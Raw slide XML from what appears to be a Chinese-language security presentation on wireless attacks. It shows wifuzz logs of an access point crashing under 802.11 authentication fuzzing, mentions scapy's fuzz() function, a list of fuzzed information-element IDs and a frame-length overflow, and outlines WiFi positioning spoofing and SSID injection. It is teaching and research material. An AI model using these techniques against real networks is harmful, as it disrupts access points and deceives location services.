              </a:rPr>
              <a:t>Thur Sep 26 21:42:04 2016 {WIFI} [R00003] Sending packets 201-300 Thur Sep 26 21:42:18 2016 {WIFI} [R00003] Checking if the AP is still up...</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Thur Sep 26 21:42:18 2016 {WIFI} Waiting for a beacon from SSID=[fuzztest] Thur Sep 26 21:42:19 2016 {WIFI} Beacon from SSID=[fuzztest] found (MAC=[11:22:33:44:55:66])</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Thur Sep 26 21:42:19 2016 {WIFI} [R00004] Sending packets 301-400</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Thur Sep 26 21:42:42 2016 {WIFI} [R00004] recv() timeout exceeded! (packet #325) Thur Sep 26 21:42:42 2016 {WIFI} [R00004] Checking if the AP is still up...</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Thur Sep 26 21:42:42 2016 {WIFI} Waiting for a beacon from SSID=[fuzztest]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Thur Sep 26 10:40:42 2016 {WIFI} [!] The AP does not respond anymore. Latest test-case has been written to '/dev/shm/wifuzz-69erb.pcap'</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2025015" y="455930"/>
            <a:ext cx="6158865" cy="9836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000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>802.11-Fuzzing</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" alt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1922780" y="453390"/>
            <a:ext cx="48514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000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>802.11-Fuzzing</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2" descr="ppt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1160" y="1731645"/>
            <a:ext cx="10058400" cy="409956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1922780" y="453390"/>
            <a:ext cx="48514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000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>802.11-Fuzzing</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2" descr="ppt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0810" y="1654810"/>
            <a:ext cx="10057765" cy="479171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框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1845945" y="531495"/>
            <a:ext cx="590804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000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>802.11-Fuzzing</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3" descr="ppt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7170" y="2308225"/>
            <a:ext cx="10058400" cy="1991360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4" descr="ppt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4925" y="5475605"/>
            <a:ext cx="5933440" cy="135255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00710" y="1545590"/>
            <a:ext cx="4237990" cy="6756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bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Fuzzing Probe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>：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en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>scapy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fuzz()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Rates</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> fuzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>！！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35965" y="4528820"/>
            <a:ext cx="55029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wireless AP Authentication Request Fuzzing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>！！！</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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星, 户外艺术系列&#10;&#10;已生成高可信度的说明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335" y="0"/>
            <a:ext cx="12376484" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="组合 8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1285240" y="1826895"/>
            <a:ext cx="8293100" cy="4067810"/>
            <a:chOff x="2848825" y="2258020"/>
            <a:chExt cx="6127574" cy="1803668"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="文本框 23"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4147480" y="2258020"/>
              <a:ext cx="3334559" cy="4088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5400" b="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>Part 01</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="5400" b="1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4" name="文本框 25"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2848825" y="3058786"/>
              <a:ext cx="6127574" cy="2587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3200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>一</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>.</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>常见的无线攻击威胁</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" b="1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5" name="文本框 26"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3581400" y="3755122"/>
              <a:ext cx="5029200" cy="3065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60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pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3" descr="微信图片_201806281745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970" y="0"/>
            <a:ext cx="2033905" cy="203390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249930" y="5203190"/>
            <a:ext cx="14662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bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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0">
        <p15:prstTrans prst="fallOver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1922780" y="453390"/>
            <a:ext cx="48514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000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>802.11-Fuzzing</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2" descr="图片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0830" y="1515110"/>
            <a:ext cx="4409440" cy="315214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031740" y="1661795"/>
            <a:ext cx="6834505" cy="47078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>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+        {   0:"SSID", </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+            1:"Rates", </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+            2:"FHset", </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+            3:"DSset", </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+            4:"CFset", </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+            5:"TIM", </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+            6:"IBSSset",</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+            7:"Country Info", </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+            8:"Hopping Set", </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+            9:"Hopping Table", </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+            10:"Request", </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+            11:"QBSS Load", </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+            12:"EDCA set", </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+            13:"TSPEC", </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+            14:"TCLAS", </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+            15:"Schedule"</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>........</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+            221:"vendor"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="120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1922780" y="453390"/>
            <a:ext cx="48514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000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>802.11-Fuzzing </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4000" b="1">
              <a:solidFill>
                <a:schemeClr val="bg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48690" y="2134870"/>
            <a:ext cx="702754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5400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>                 Demo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US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1922780" y="453390"/>
            <a:ext cx="48514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000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>802.11-Fuzzing</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2" descr="ppt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8155" y="1641475"/>
            <a:ext cx="10058400" cy="288036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20395" y="4779645"/>
            <a:ext cx="5772785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en-US" altLang="zh-CN">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Fuzzing testing </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MAC frame lenth ≥1100</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>buffer  ...............overflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>0</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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1922780" y="453390"/>
            <a:ext cx="48514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000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wifi positioning Spoof</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4000" b="1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26745" y="1738630"/>
            <a:ext cx="6882765" cy="42462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rgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WiFi 定位原理：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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1、每一个无线AP都有一个全球唯一的MAC地址,并且一般来说无线AP在一段时间内是不会移动的。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2、设备在开启Wi-Fi的情况下,即可扫描并收集周围的AP信号,无论是否加密,是否已连接，甚至信号强度不足以显示在无线信号列表中,都可以获取到AP广播出来的MAC地址。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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3、设备将这些能够标示AP的数据发送到位置服务器,服务器检索出每一个AP的地理位置,并结合每个信号的强弱程度,计算出设备的地理位置并返回到用户设备。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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4、位置服务商要不断更新、补充自己的数据库,以保证数据的准确性,毕竟无线AP不像基站塔那样基本100%不会移动。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3" descr="129774248_2_2018041010142548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50835" y="2684780"/>
            <a:ext cx="3780790" cy="2066925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1922780" y="453390"/>
            <a:ext cx="485140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000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>wifi positioning Spoof</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4000" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4000" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2" descr="图片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8590" y="1552575"/>
            <a:ext cx="9828530" cy="518795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1922780" y="453390"/>
            <a:ext cx="48514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000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>wifi positioning Spoof  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4000" b="1">
              <a:solidFill>
                <a:schemeClr val="bg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19785" y="2395220"/>
            <a:ext cx="879411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5400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                Demo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="54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 3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7" name="直接连接符 36" descr="e7d195523061f1c0deeec63e560781cfd59afb0ea006f2a87ABB68BF51EA6619813959095094C18C62A12F549504892A4AAA8C1554C6663626E05CA27F281A14E6983772AFC3FB97135759321DEA3D70145073B7709DEAFA256CD57602346C569CD03E8246D33DA545568EA98FB062D63F616CDCDDC7C308D5561BD508072CED46FA16A315624C7F2FF57E77E923953F"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="338824" y="1319686"/>
            <a:ext cx="7200000" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="1270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 descr="e7d195523061f1c0deeec63e560781cfd59afb0ea006f2a87ABB68BF51EA6619813959095094C18C62A12F549504892A4AAA8C1554C6663626E05CA27F281A14E6983772AFC3FB97135759321DEA3D70145073B7709DEAFA256CD57602346C569CD03E8246D33DA545568EA98FB062D63F616CDCDDC7C308D5561BD508072CED46FA16A315624C7F2FF57E77E923953F"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="338824" y="1400648"/>
            <a:ext cx="7200000" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3810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文本框 44" descr="e7d195523061f1c0deeec63e560781cfd59afb0ea006f2a87ABB68BF51EA6619813959095094C18C62A12F549504892A4AAA8C1554C6663626E05CA27F281A14E6983772AFC3FB97135759321DEA3D70145073B7709DEAFA256CD57602346C569CD03E8246D33DA545568EA98FB062D63F616CDCDDC7C308D5561BD508072CED46FA16A315624C7F2FF57E77E923953F"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2406490" y="376845"/>
            <a:ext cx="372237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solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="创艺简细圆" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Kartika" panose="02020503030404060203" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>SSID injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="创艺简细圆" pitchFamily="2" charset="-122"/>
              <a:cs typeface="Kartika" panose="02020503030404060203" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Freeform 35"/>
